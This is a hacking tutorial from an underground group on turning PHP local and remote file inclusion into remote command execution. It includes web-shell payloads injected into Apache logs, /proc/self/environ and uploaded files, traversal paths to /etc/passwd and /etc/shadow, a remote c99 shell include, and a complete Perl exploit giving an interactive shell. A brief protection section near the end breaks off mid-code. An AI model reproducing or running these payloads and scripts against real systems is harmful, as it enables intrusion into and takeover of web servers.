LFI to RCE Exploit with Perl Script

1. ##########
2. Contents
3. ##########
4.  
5. [0x00] - Introduction
6.  
7. [0x01] - File Inclusion (RFI/LFI)
8.  
9. [0x01a] - How the attack works for Remote File Inclusion [RFI]
10. [0x01b] - How the attack works for Local File Inclusion [LFI]
11. [0x01c] - Vulnerable PHP Function for File Inclusion
12.  
13. [0x02] - Local File Inclusion To Remote Command Execution [LFI <> RCE]
14.  
15. [0x02a] - LFI <> RCE via Apache Log Injection
16. [0x02b] - LFI <> RCE via Process Environ Injection
17. [0x02c] - LFI <> RCE via Other Files
18.  
19. [0x03] - Fundamental of Perl Library for Exploit Website
20.  
21. [0x03a] - Introduction to Socket
22. [0x03b] - Introduction to Library for WWW in Perl (LWP)
23. [0x03c] - Condition to use Socket or LWP
24.  
25. [0x04] - Writing LFI <> RCE Exploit with Perl Script
26.  
27. [0x04a] - Perl Exploit to Injecting code into Target
28. [0x04b] - Perl Exploit to Executing injected code on Target
29. [0x04c] - LFI <> RCE Complete Exploit [Use Logfile Injection]
30.  
31. [0x05] - How to protect File Inclusion
32.  
33. [0x06] - References
34.  
35. [0x07] - Greetz To
36.  
37.  
38. #######################
39. [0x00] - Introduction
40. #######################
41.  
42. Welcome reader, this paper is a short attempt at documenting a practical technique
43. we have been working on. This papers will guide about technique that allows the attackers
44. (us) gaining access into the process of exploiting a website via File Inclusion (RFI/LFI)
45. and enlight the way to create own exploit script with perl
46.  
47. This paper is divided into 7 sections but only from section 0x01 to 0x05
48. are about technical information.
49.  
50. Section 0x01, we talk about general concept of attacking via File Inclusion.
51. Section 0x02, we give a detail of how to execute arbitrary command via Local File Inclusion
52. in each approach. Section 0x03, we offer rudimentary commands to create HTTP transaction
53. with perl and some examples of how to use them. Section 0x04, we assemble knowleadge from
54. Section 0x01 to 0x03 in order to create own exploit to execute command on target system
55. via Local File Inclusion. The last, section 0x05, we suggest some methods to protect
56. your system from File Inclusion Attacking.
57.  
58.  
59. ###################################
60. [0x01] - File Inclusion (RFI/LFI)
61. ###################################
62.  
63. In a File Inclusion, Attackers run their own code on a vulnerable website.
64. The attack involves importing code into a program by taking advantage of the unenforced
65. and unchecked assumptions the program makes about its inputs. If the attacker can include
66. their own malicious code on a web page, it is possible to "convince" a PHP script to include
67. a remote file instead of a presumably trusted file from the local file system.
68.  
69.  
70. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
71. [0x01a] - How the attack works for Remote File Inclusion [RFI]
72. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
73.  
74. Remote File Inclusion, known as RFI, is the technique to attack website by
75. injecting php script into target website. It's including "External" files (PHP Shell)
76. in a victim website.If attacker exploits successfully, he can execute arbitary command
77. on victim web server.
78.  
79. For instance, a piece of vulnerable PHP code would look like this:
80.  
81. [code]----------------------------------------------------------------------------------
82. <?php
83. $file =$_GET['page']; //The page we wish to display
84. include($file .".php"); <-- Vulnerable !!
85. ?>
86. [End code]---------------------------------------------------------------------------------
87.  
88. From Code, It does not perform any checks on the content of the $page variable so it is easy
89. to putting our file (PHP Shell) into webpage like this
90.  
91. [URL] http://www.hackme.com/index.php?page=http://www.cwh.org/c99.php? and then
92.  
93. [code]---------------------------------------------------------------------------------
94. <?php
95. $file ="http://www.cwh.org/c99.php?"; //$_GET['page'];
96. include($file .".php"); //include http://www.cwh.org/C99.php?.php
97. ?>
98. [End code]---------------------------------------------------------------------------------
99.  
100. ** We put "?" at the end of the URL, This makes the script fetch the intended file,
101. with the appended string as a parameter (which is ignored by the attackers script) **
102.  
103.  
104. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
105. [0x01b] - How the attack works for Local File Inclusion [LFI]
106. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
107.  
108. LFI is a Local File Inclusion. It originates from including "internal" files
109. in a victim website. In many situations, It is necessary to include content from
110. local file. But if you use it carelessly, it may lead to LFI vulnerabilty. This method
111. is often used in Linux to get "/etc/passwd" and sometimes "/etc/shadow".
112.  
113. For instance, a piece of vulnerable PHP code would look like this:
114.  
115. [URL] http://www.hackme.com/index.php?template=cwh
116.  
117. [code #1]-------------------------------------------------------------------------------
118. <?php
119. $template =$_GET['template'];
120. include("/".$template .".php"); <-- Vulnerable !!
121. ?>
122. [End code]------------------------------------------------------------------------------
123.  
124. From Code, Attacker can assign template to be "../../../../etc/passwd%00".
125. It causes the attacker to read a content from /etc/passwd.
126.  
127. [URL] http://www.hackme.com/index.php?template=../../../../etc/passwd%00
128.  
129. [code #1]-------------------------------------------------------------------------------
130. <?php
131. $template =$_GET['template'];
132. include("/../../../../etc/passwd%00.php"); <-- Directory Traversal to LFI
133. ?>
134. [End code]------------------------------------------------------------------------------
135.  
136. ** Notice %00 (Null CHAR) will ignore everything that comes after %00 (.php suffix) **
137. ** Notice ../../../ will traversal path to root and goto /etc/passwd **
138.  
139. [code #2]-------------------------------------------------------------------------------
140. if(grado($HTTP_COOKIE_VARS['cwh_user'],$HTTP_COOKIE_VARS['cwh_pass']) == "admin")
141. {
142. topmenu();
143. include("manage/admin/main.php");
144. foot();
145. } else
146. {
147. topmenu();
148. include("manage/".$HTTP_COOKIE_VARS['cwh_user']."/main.php");
149. foot();
150. }
151. [End code]------------------------------------------------------------------------------
152.  
153. From Code, Attacker can exploit via JaSiLDBG
154. (Javascript Inline Debugger - www.milw0rm.com/papers/147)
155.  
156. PoC Exploit: javascript:document.cookie = "cwh_user=../../../../etc/passwd%00; path=/";
157.  
158.  
159. ++++++++++++++++++++++++++++++++++++++++++++++++++++++
160. [0x01c] - Vulnerable PHP Function for File Inclusion
161. ++++++++++++++++++++++++++++++++++++++++++++++++++++++
162.  
163. File Inclusion (RFI/LFI) mostly occurs from some functions that developers
164. do not properly check user supplied data.
165.  
166. Example PHP function:
167.  
168. include()
169. include_once()
170. require()
171. require_once()
172. fopen()
173.  
174.  
175. #######################################################################
176. [0x02] - Local File Inclusion To Remote Command Execution [LFI<>RCE]
177. #######################################################################
178.  
179. In this section, we mention about the concept of using LFI in another way besides reading files.
180. Normally, We use LFI to read following files:
181.  
182. /etc/passwd
183. /etc/shadow
184. /etc/group
185. /etc/security/passwd
186. /etc/security/user
187. /etc/security/environ
188. /etc/security/limits
189. or
190. Dababase Configuration (config.inc.php)
191.  
192. But we can apply LFI Vulnerabilities to execute command by injecting malicious code
193. into Apache log, Process Environment and Other files. This method is called "Remote Code Execution (RCE)"
194.  
195.  
196. +++++++++++++++++++++++++++++++++++++
197. [0x02a] - LFI <> RCE via Apache Log
198. +++++++++++++++++++++++++++++++++++++
199.  
200. The Malicious HTTP Request must existed to Apache logs, By their intrinsic nature logfiles contain
201. data that is driven by users look like this:
202.  
203. [HTTP Request via Telnet]---------------------------------------------------------------
204. >telnet www.hackme.com 80
205. GET /index.php?p=new.php HTTP/1.1 <-- Normally GET Request when user visit websites
206.  
207. HTTP/1.1 200 OK Content-Length: 82015 Content-Type: text/html Content-Location: ……
208. ………
209. [End Telnet]----------------------------------------------------------------------------
210.  
211. [Logfiles - access.log]-----------------------------------------------------------------
212. ......
213. 58.18.29.152 - - [05/Dec/2008:12:13:22 +0700]
214. "GET /index.php?p=new.php HTTP/1.1" 200 1958
215. ......
216. [End log]-------------------------------------------------------------------------------
217.  
218. If we want to run arbitrary command on target system, we must inject PHP code via
219. HTTP request like <?passthru($_GET[cmd])?> After that logfiles will contain Malicious Code
220.  
221. [Malicious HTTP Request via Telnet]-----------------------------------------------------
222. >telnet www.hackme.com 80
223. GET /cwh/<? passthru($_GET[cmd]) ?> HTTP/1.1 <-- Malicious HTTP Request via Telnet
224.  
225. ………
226. ………
227. [End telnet]----------------------------------------------------------------------------
228.  
229. [Logfiles - access.log]-----------------------------------------------------------------
230. ......
231. 58.18.29.152 - - [05/Dec/2008:12:14:22 +0700]
232. "GET /cwh/<? passthru($_GET[cmd]) ?> HTTP/1.1" 200 1958 <-- Inject Code into Logfiles
233. ......
234. [End log]-------------------------------------------------------------------------------
235.  
236. Now We can use LFI Vuln to run arbitrary command by finding out where the logs are stored
237. Go to LFI Vuln path:
238.  
239. [URL] www.hackme.com/index.php?p=../../apache/logs/access.log <-- You must find Log location
240. (You can see ../../ that traversal to apache access log)
241.  
242. In webpage, you will see detailed like this:
243.  
244. Warning: passthru() [function.passthru]: Cannot execute a blank command in
245. /opt/lampp/apache/logs/access.log on line 457
246.  
247. That's Great !! We have alredy injected code to logfiles, Now run arbitrary command
248. with "cmd" variable like this:
249.  
250. [LFI <> RCE URL] www.hackme.com/index.php?p=../../apache/logs/access.log%00&cmd=ls -la
251.  
252. ** Notice **
253.  
254. If you send Malicious HTTP Request from browser
255. "www.hackme.com/cwh/<? passthru($_GET[cmd]) ?>", the logfile will show in URL encode format
256.  
257. [Logfiles - access.log]-----------------------------------------------------------------
258. ......
259. 58.18.29.152 - - [05/Dec/2008:12:15:14 +0700]
260. "GET /cwh/%3C?%20passthru($_GET[cmd])%20?%3E HTTP/1.1" 200 1958 <-- Not work for Inject
261. ......
262. [End log]-------------------------------------------------------------------------------
263.  
264. It won't work for RCE because browser will automatically encode special characters
265. (URL encode) after that it writes encoded request into logfiles (access.log).
266. So we must Inject malicious code via Telnet, Netcat or Perl script with
267. socket/useragent/referer that we will guide in next chapter.
268.  
269. == How about error.log ==
270.  
271. Error log is written when the requested file does not exist. Thus we can inject
272. malicious code by requesting to non-existed file or inject via "Referer".
273.  
274. [Malicious HTTP Request via Telnet]-----------------------------------------------------
275. >telnet www.hackme.com 80
276. GET /<? passthru($_GET[cmd]) ?> <-- Get non-existed file with PHP Code
277.  
278. ………
279. ………
280. [End telnet]----------------------------------------------------------------------------
281.  
282. [Logfiles - error.log]------------------------------------------------------------------
283. ......
284. [Sat Dec 06 15:12:56 2008] [error] [client 127.0.0.1] (20024)The given path
285. misformatted or contained invalid characters: Cannot map GET /<?passthru($_GET[cmd])?> to file
286. ......
287. [End log]-------------------------------------------------------------------------------
288.  
289. Bingo !! We can injected code thru error.log, Next example show you about inject code
290. into "referer".
291.  
292. [Logfiles - error.log]------------------------------------------------------------------
293. ......
294. [Sat Dec 06 13:57:57 2008] [error] [client 58.14.21.120]
295. File does not exist: /opt/lampp/htdocs/test/images/boxmenu.gif,
296. referer: http://www.hackme.com/index.php?p=main.php <-- Normally HTTP Request
297. ......
298. [End log]-------------------------------------------------------------------------------
299.  
300. From log, Attacker can inject malicious code into "referer" then error.log will be written
301. evil code. However injecting to access.log is easier than error.log
302.  
303. [Logfiles - error.log]------------------------------------------------------------------
304. ......
305. [Sat Dec 06 13:57:57 2008] [error] [client 58.14.21.120]
306. File does not exist: /opt/lampp/htdocs/test/images/boxmenu.gif,
307. referer: <? passthru($_GET[cmd]) ?> <-- Inject Malicious Code in Referer
308. ......
309. [End log]-------------------------------------------------------------------------------
310.  
311. Default Log locations list that used with LFI:
312.  
313. ../apache/logs/error.log
314. ../apache/logs/access.log
315. ../../apache/logs/error.log
316. ../../apache/logs/access.log
317. ../../../apache/logs/error.log
318. ../../../apache/logs/access.log
319. ../../../../../../../etc/httpd/logs/acces_log
320. ../../../../../../../etc/httpd/logs/acces.log
321. ../../../../../../../etc/httpd/logs/error_log
322. ../../../../../../../etc/httpd/logs/error.log
323. ../../../../../../../var/www/logs/access_log
324. ../../../../../../../var/www/logs/access.log
325. ../../../../../../../usr/local/apache/logs/access_ log
326. ../../../../../../../usr/local/apache/logs/access. log
327. ../../../../../../../var/log/apache/access_log
328. ../../../../../../../var/log/apache2/access_log
329. ../../../../../../../var/log/apache/access.log
330. ../../../../../../../var/log/apache2/access.log
331. ../../../../../../../var/log/access_log
332. ../../../../../../../var/log/access.log
333. ../../../../../../../var/www/logs/error_log
334. ../../../../../../../var/www/logs/error.log
335. ../../../../../../../usr/local/apache/logs/error_l og
336. ../../../../../../../usr/local/apache/logs/error.l og
337. ../../../../../../../var/log/apache/error_log
338. ../../../../../../../var/log/apache2/error_log
339. ../../../../../../../var/log/apache/error.log
340. ../../../../../../../var/log/apache2/error.log
341. ../../../../../../../var/log/error_log
342. ../../../../../../../var/log/error.log
343.  
344.  
345. ++++++++++++++++++++++++++++++++++++++++++
346. [0x02b] - LFI <> RCE via Process Environ
347. ++++++++++++++++++++++++++++++++++++++++++
348.  
349. When we request to PHP page, new process will be created. In *nix system, Each process
350. has its own /proc entry. /proc/self/ is a static path and symbolic link from lastest process
351. used that contain useful information. If we inject malicious code into /proc/self/environ, we
352. can run arbitrary command from target via LFI
353.  
354. [The Question] How to inject code into /proc/self/environ ?
355. [The Answer] We can inject thru User-Agent.
356.  
357. In Firefox Browser, we use "User Agent Switcher Add-ons" that can specify your user agent
358. manually Or use perl script to specify user agent with malicious code (See Next chapter).
359.  
360. For instance, a piece of /proc/self/environ would look like this:
361.  
362. [code]----------------------------------------------------------------------------------
363. PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
364. [email protected]
365. ...
366. Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4)
367. Gecko/2008102920 Firefox/3.0.4 HTTP_KEEP_ALIVE=300 <-- It contains User-agent
368. ...
369. [End code]------------------------------------------------------------------------------
370.  
371. When we injected <?passthru($_GET[cmd])?> into our User Agent,
372. /proc/self/environ will contain Malicious code like this:
373.  
374. [code]----------------------------------------------------------------------------------
375. PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
376. [email protected]
377. ...
378. <?passthru($_GET[cmd])?> HTTP_KEEP_ALIVE=300 <-- Injected Malicious code
379. ...
380. [End code]------------------------------------------------------------------------------
381.  
382. Then Go to www.hackme.com/index.php?p=../../../../../proc/self/environ%00&cmd=ls -la
383.  
384. ** Notice **
385.  
386. We don't recommend to use this method because It's immediately to inject code and run
387. command before self link change to other process.
388.  
389.  
390. ++++++++++++++++++++++++++++++++++++++
391. [0x02c] - LFI <> RCE via Other Files
392. ++++++++++++++++++++++++++++++++++++++
393.  
394. We saw Vulnerabilities in old version of FCKEditor (www.milw0rm.com/exploits/1484)
395. that allow many file extension to be uploaded, Some versions we can upload an extension not specified in FCKEditor
396. Config[DeniedExtensions][File] array such as .php3,.aa,.bb,.cwh,.blahblahblah. If the website have vulnerability
397. in Local File Inclusion, we can inject malicious code (<?passthru($_GET[cmd])?>) into uploaded file and use LFI
398. traversal with uploaded file links (/userfiles/upload/shell.cwh) to run arbitrary command.
399.  
400. For example:
401.  
402. [LFI Vulnerable] www.hackme.com/index.php?p=
403. [Uploaded File] www.hackme.com/userfiles/upload/shell.cwh
404. [LFI <> RCE] www.hackme.com/index.php?p=./userfiles/upload/shell.cwh%00&cmd=ls -la
405.  
406. Many website in the world allow to upload image file (jpg/gif/bmp/...) almost websites only check file extension
407. (.jpg/.gif/...) so it's vuln !!. If Attacker inject malicious code into image file (Maybe use edjpgcom to insert PHP code
408. to jpeg file or change extension to image file manually) and upload to target server, Use LFI technique traversal to
409. uploaded file and execution arbitrary command.
410.  
411. ** We will guide you about specify file extension with Perl in Next chapter **
412.  
413.  
414. ##########################################################
415. [0x03] - Fundamental of Perl Library for Exploit Website
416. ##########################################################
417.  
418. In this section, we will talk about fundamental of neccessary perl commands used to send HTTP packet to server.
419. They play a significant role in writing exploit. We recommend you to read this section before step to next section.
420. But if you are familiar with Socket and LWP, you can skip this section. All commands mentioned in this section will be
421. used in next section.
422.  
423. ++++++++++++++++++++++++++++++++++
424. [0x03a] - Introduction to Socket
425. ++++++++++++++++++++++++++++++++++
426.  
427. Socket is method to create a connection between hosts. we use it to create a connection between our pc
428. and a remote server in order to send manipulated request to a server. The informations that we have to provide for
429. a socket are protocol, server address, server port and data. In perl, we use IO::Socket library to create a socket.
430.  
431. Syntax for create a socket is following.
432.  
433. [code]----------------------------------------------------------------------------------
434. $socket = IO::Socket::INET->new (PROTOCAL, PEERADDR, PEERPORT);
435. [End code]------------------------------------------------------------------------------
436.  
437. For Example: If we want to create socket to port 80 on server ip 192.168.0.111 with tcp protocol,
438. we can use following command:
439.  
440. [code]----------------------------------------------------------------------------------
441. $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80");
442. [End code]------------------------------------------------------------------------------
443.  
444. when we want to send http request through this socket, we can use this syntax.
445.  
446. [code]----------------------------------------------------------------------------------
447. print $socket $data;
448. [End code]------------------------------------------------------------------------------
449.  
450. For Example:
451.  
452. [code]----------------------------------------------------------------------------------
453. $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80");
454. print $socket "GET /index.php HTTP/1.1\r\n";
455. print $socket "Host: 192.168.0.111\r\n";
456. print $socket "Connection: close\r\n\r\n";
457. [End code]------------------------------------------------------------------------------
458.  
459. After finish using socket, we have to close the socket by this syntax.
460.  
461. [code]----------------------------------------------------------------------------------
462. close ($socket);
463. [End code]------------------------------------------------------------------------------
464.  
465. Finally, we can group the entire code together.
466.  
467. [code]----------------------------------------------------------------------------------
468. use IO::Socket;
469. $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80");
470. print $socket "GET /index.php HTTP/1.1\r\n";
471. print $socket "Host: 192.168.0.111\r\n";
472. print $socket "Connection: close\r\n\r\n";
473. close ($socket);
474. [End code]------------------------------------------------------------------------------
475.  
476.  
477. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++
478. [0x03b] - Introduction to Library for WWW in Perl (LWP)
479. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++
480.  
481. LWP is a set of perl module designed to handle sending of http request. Usually we use this library
482. simultaneously with HTTP::Request and HTTP::Response.
483.  
484. If we speak clearly, we can classify a role of these library as following:
485.  
486. - HTTP::Request => used to manipulate http request.
487. - LWP::UserAgent => used to sent http request.
488. - HTTP::Response => used to handle http response.
489.  
490. If we want to use these libraries to obtain content from index.php file on 192.168.0.111,
491. we can following these steps.
492.  
493. 1: Create http request header using HTTP::Request
494.  
495. [code]----------------------------------------------------------------------------------
496. $request = HTTP::Request->new (GET => "http://192.168.0.111/index.php");
497. $request->header (User_Agent => "Mozilla 2.0");
498. [End code]------------------------------------------------------------------------------
499.  
500. 2: Send the http request to server by LWP::UserAgent and obtain http response by HTTP::Response
501.  
502. [code]----------------------------------------------------------------------------------
503. $ua = LWP::UserAgent->new();
504. $response = $ua->request ($request); ## Return value of request function is HTTP::Response object.
505. ## So now we have $response holding HTTP::Response object
506. [End code]------------------------------------------------------------------------------
507.  
508. 3: Get http response content from HTTP::Response object, Ex:
509.  
510. [code]----------------------------------------------------------------------------------
511. print $response->code; ## response code ex. 200, 404, 503
512. print $response->header->as_string; ## response header
513. print $response->content; ## html code of http response
514. [End code]------------------------------------------------------------------------------
515.  
516. If we group all code together to show header and content of http transaction, we can do following:
517.  
518. [code]----------------------------------------------------------------------------------
519. use LWP;
520. use HTTP::Request;
521.  
522. $request = HTTP::Request->new (GET => "http://192.168.0.111/index.php");
523. $request->header (User_Agent => "Mozilla 2.0");
524.  
525. $ua = LWP::UserAgent->new();
526. $response = $ua->request ($request);
527.  
528. print $response->header->as_string; ## $response->header is an object of HTTP::Header. It cannot to print as string,
529. ## so we use as_string method to solve this problem
530. print "\n";
531. print $response->content;
532. [End code]------------------------------------------------------------------------------
533.  
534.  
535. ++++++++++++++++++++++++++++++++++++++++++
536. [0x03c] - Condition to use Socket or LWP
537. ++++++++++++++++++++++++++++++++++++++++++
538.  
539. As you can see above, Socket and LWP can send http request to server.
540. But we have only a few conditions to dicide to use Socket or LWP.
541.  
542. 1: We will use Socket when,
543.  
544. - We do not want http response. (Only inject http request packet to server)
545. - We do not want http request to be encoded. (If we send get method with LWP, the HTTP request will be URL Encoded)
546.  
547. 2: We will use LWP when,
548.  
549. - We want http response. (It will be stored in HTTP::Response object)
550. - Other condition ;D (We think it is more convenient to us than Socket)
551.  
552.  
553. ######################################################
554. [0x04] - Writing LFI <> RCE Exploit with Perl Script
555. ######################################################
556.  
557. ++++++++++++++++++++++++++++++++++++++++++++++++++++++
558. [0x04a] - Perl Exploit to Injecting code into Target
559. ++++++++++++++++++++++++++++++++++++++++++++++++++++++
560.  
561. We can inject our php code to server in many ways as I mention above. The rest that we have to work
562. with is creating perl script to do our task.
563. To create perl script to send malicious request, we will use socket to help this part.
564. Before writing perl script, we have to know which file we will inject code into and how to do that.
565.  
566. [+] Inject via logfile
567.  
568. Logfiles are written when there is a request to a file on server. Thus we can manipulate
569. http request in order to inject malicious code.
570.  
571. Example:
572.  
573. [code]----------------------------------------------------------------------------------
574. $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80");
575. print $socket "GET /cwhunderground <? passthru(\$_GET[cmd]); ?> HTTP/1.1\r\n";
576. print $socket "host: 192.168.0.111\r\n";
577. print $socket "Connection: close\r\n\r\n";
578. close ($socket);
579. [End code]------------------------------------------------------------------------------
580.  
581.  
582. [+] Inject via Other files
583.  
584. In some websites, they allow us to upload files. If we know the path to uploaded file,
585. we can use LFI vulnerability to execute command in our uploaded file.
586.  
587. Example:
588.  
589. [code]----------------------------------------------------------------------------------
590. $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80");
591. print $socket "POST /uploadsave.php HTTP/1.1\r\n";
592. print $socket "host: 192.168.0.111\r\n";
593. print $socket "Content-Type: multipart/form-data; boundary=CwHCwH\r\n";
594. print $socket "--CwHCwH\r\n";
595. print $socket "Content-Disposition: form-data; name=\"shell.cwh\"; filename=\"shell.cwh\"\r\n";
596. print $socket "Content-Type: application/zip\r\n\r\n";
597. print $socket "<? passthru(\$_GET[cmd]); ?>\n";
598. print $socket "--CwHCwH\r\n";
599. close ($socket);
600. [End code]------------------------------------------------------------------------------
601.  
602.  
603. [+] Inject via process environment
604.  
605. In process environment file, there is user agent of using browser as a part of content.
606. Therefore we can inject malicious code by spoofing user agent.
607.  
608. Example:
609.  
610. [code]----------------------------------------------------------------------------------
611. $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80");
612. print $socket "GET /index.php HTTP/1.1\r\n";
613. print $socket "host: 192.168.0.111\r\n";
614. print $socket "User-Agent: <? passthru(\$_GET[cmd]); ?>\r\n";
615. print $socket "Connection: close\r\n\r\n";
616. close ($socket);
617. [End code]------------------------------------------------------------------------------
618.  
619.  
620. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
621. [0x04b] - Perl Exploit to Executing injected code on Target
622. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
623.  
624. As previous section, we can inject malicious code into some files on server by example code.
625. In this section, we will show how to create script to execute our code on server. So, we have to bring
626. the concept from section 0x03b about LWP library.
627. (We choose to use LWP because we need http response to show result from execution of our code)
628.  
629. [+] Execute code from logfile
630.  
631. [code]----------------------------------------------------------------------------------
632. use LWP;
633. use HTTP::Request;
634.  
635. $logfile = "../../../../var/log/httpd/access.log"; <-- We must specify Logfile locations
636.  
637. ## looping for execute command and exit program when command = exit ##
638. print "cwh-shell# ";
639. chomp( $cmd = <STDIN> );
640. while($cmd !~ "exit")
641. {
642. $content = "";
643. $request = HTTP::Request->new (GET => "http://192.168.0.111/path/to/lfi.php?file=".$logfile."%00&cmd=".$cmd);
644. $ua = LWP::UserAgent->new();
645. $response = $ua->request ($request);
646. $content = $response->content;
647. print $content."\n";
648. print "cwh-shell# ";
649. chomp( $cmd = <STDIN> );
650. }
651. [End code]------------------------------------------------------------------------------
652.  
653.  
654. [+] Execute code from Other files
655.  
656. I assume that the uploaded file is ../../../path/to/uploaded/file/shell.cwh .
657. We will get RCE script like this.
658.  
659. [code]----------------------------------------------------------------------------------
660. use LWP;
661. use HTTP::Request;
662.  
663. $uploadedfile = "../../../path/to/uploaded/file/shell.cwh";
664.  
665. ## looping for execute command and exit program when command = exit ###
666. print "cwh-shell# ";
667. chomp( $cmd = <STDIN> );
668. while($cmd !~ "exit")
669. {
670. $content = "";
671. $request = HTTP::Request->new (GET => "http://192.168.0.111/path/to/lfi.php?file=".$uploadedfile."%00&cmd=".$cmd);
672. $ua = LWP::UserAgent->new();
673. $response = $ua->request ($request);
674. $content = $response->content;
675. print $content."\n";
676. print "cwh-shell# ";
677. chomp( $cmd = <STDIN> );
678. }
679. [End code]------------------------------------------------------------------------------
680.  
681. [+] Execute code from process environment
682.  
683. The injected process environment file is /proc/self/environ.
684. So, we have to traversal back to root path by using ../../
685.  
686. [code]----------------------------------------------------------------------------------
687. use LWP;
688. use HTTP::Request;
689.  
690. $procenviron = "../../../../../../proc/self/environ";
691.  
692. ## looping for execute command and exit program when command = exit ##
693. print "cwh-shell# ";
694. chomp( $cmd = <STDIN> );
695. while($cmd !~ "exit")
696. {
697. $content = "";
698. $request = HTTP::Request->new (GET => "http://192.168.0.111/path/to/lfi.php?file=".$procenviron."%00&cmd=".$cmd);
699. $ua = LWP::UserAgent->new();
700. $response = $ua->request ($request);
701. $content = $response->content;
702. print $content."\n";
703. print "cwh-shell# ";
704. chomp( $cmd = <STDIN> );
705. }
706. [End code]------------------------------------------------------------------------------
707.  
708.  
709. Finally, as you can see from three codes above, the code to loop for execute command is the same.
710. The difference is how to find a path of injected file.
711.  
712. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
713. [0x04c] - LFI <> RCE Complete Exploit [Use Logfile Injection]
714. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
715.  
716. In order to execute code from logfile, we have a problem that we do not know the exact path of logfile.
717. So we have to find path by looping through the fesible paths that we have and see which file contain
718. the word "cwhunderground" as we inject in previous example code.
719.  
720. Simple Code for LFI <> RCE Exploit:
721.  
722. [code]----------------------------------------------------------------------------------
723. use LWP::UserAgent;
724. use IO::Socket;
725. use LWP::Simple;
726.  
727. $log="../";
728. @apache=(
729. "../../../../../var/log/httpd/access_log",
730. "../apache/logs/access.log",
731. "../../apache/logs/access.log",
732. "../../../apache/logs/access.log",
733. "../../../../apache/logs/access.log",
734. "../../../../../apache/logs/access.log",
735. "../logs/access.log",
736. "../../logs/access.log",
737. "../../../logs/access.log",
738. "../../../../logs/access.log",
739. "../../../../../logs/access.log",
740. "../../../../../etc/httpd/logs/access_log",
741. "../../../../../etc/httpd/logs/access.log",
742. "../../.. /../../var/www/logs/access_log",
743. "../../../../../var/www/logs/access.log",
744. "../../../../../usr/local/apache/logs/access_log",
745. "../../../../../usr/local/apache/logs/access.log",
746. "../../../../../var/log/apache/access_log",
747. "../../../../../var/log/apache/access.log",
748. "../../../../../var/log/access_log",
749. "../../../../../var/log/access_log"
750. );
751.  
752. my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
753.  
754. print "\n==========================================\n";
755. print " LFI to RCE Exploit \n";
756. print " By CWH Underground \n";
757. print "==========================================\n";
758.  
759. if (@ARGV < 2)
760. {
761. print "Usage: ./xpl.pl <Host> <Path>\n";
762. print "Ex. ./xpl.pl www.hackme.com /ktp/index.php?page=\n";
763. }
764.  
765. $host=$ARGV[0];
766. $path=$ARGV[1];
767.  
768. if ( $host =~ /^http:/ ) {$host =~ s/http:\/\///g;}
769.  
770. print "\nTrying to Inject the Code...\n";
771. $CODE="<?php if(get_magic_quotes_gpc()){ \$_GET[cmd]=stripslashes(\$_GET[cmd]);} passthru(\$_GET[cmd]);?>";
772. $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";
773. print $socket "GET /cwhunderground "."\#\#%\$\$%\#\#".$CODE."\#\#%\$\$%\#\#"." HTTP/1.1\r\n";
774. print $socket "Host: ".$host."\r\n";
775. print $socket "Connection: close\r\n\r\n";
776. close($socket);
777.  
778. if ( $host !~ /^http:/ ) {$host = "http://" . $host;}
779.  
780. foreach $getlog(@apache)
781. {
782. chomp($getlog);
783. $find= $host.$path.$getlog."%00";
784. $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
785. $req = HTTP::Request->new(GET => $find);
786. $res = $xpl->request($req);
787. $info = $res->content;
788. if($info =~ /cwhunderground/)
789. {print "\nSuccessfully injected in $getlog \n";$log=$getlog;}
790. }
791.  
792. print "cwh-shell# ";
793. chomp( $cmd = <STDIN> );
794.  
795. while($cmd !~ "exit") {
796. $shell= $host.$path.$log."%00&cmd=$cmd";
797. $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
798. $req = HTTP::Request->new(GET => $shell);
799. $res = $xpl->request($req);
800. $info = $res->content;
801. if ($info =~ /\#\#%\$\$%\#\#(.*?)\#\#%\$\$%\#\#/sg)
802. {print $1;}
803. print "cwh-shell# ";
804. chomp( $cmd = <STDIN> );
805. }
806. [End code]------------------------------------------------------------------------------
807.  
808.  
809. ########################################
810. [0x05] - How to protect File Inclusion
811. ########################################
812.  
813. - Consider implementing a chroot jail
814. - Check user supplied files or filenames
815. - Strongly validate user input, Ensure that all variables
816. are properly initialized prior to the first use
817. - Disable allow_url_fopen and allow_url_include
818. - Disable register_globals and use E_STRICT to find uninitialized variables
819. - Ensure that all file and stream functions (stream_*) are carefully vetted
820. - To avoid being injected with remote files, it is essential to specify exactly
821. where the file should be located, e.g. its full path
822. - Secure Code, If you want to use include() function, For example:
823.  
824. // Vulnerable Code !!
825.  
826.  
827. [code]----------------------------------------------------------------------------------
828. <?php
829. $file =$_GET['page'];
830. include($file);
831. ?>
832. [End code]------------------------------------------------------------------------------
833.  
834.  
835. // #1 Patching Code !!
836.  
837.  
838. [code]----------------------------------------------------------------------------------
839. <?php
840. include "./new.php"; <-- Should not use file name from $_GET content,
841. ?> Always specify your files to include
842. [End code]------------------------------------------------------------------------------
843.  
844.  
845. // #2 Patching Code !!
846.  
847.  
848. [code]----------------------------------------------------------------------------------
849. <?php
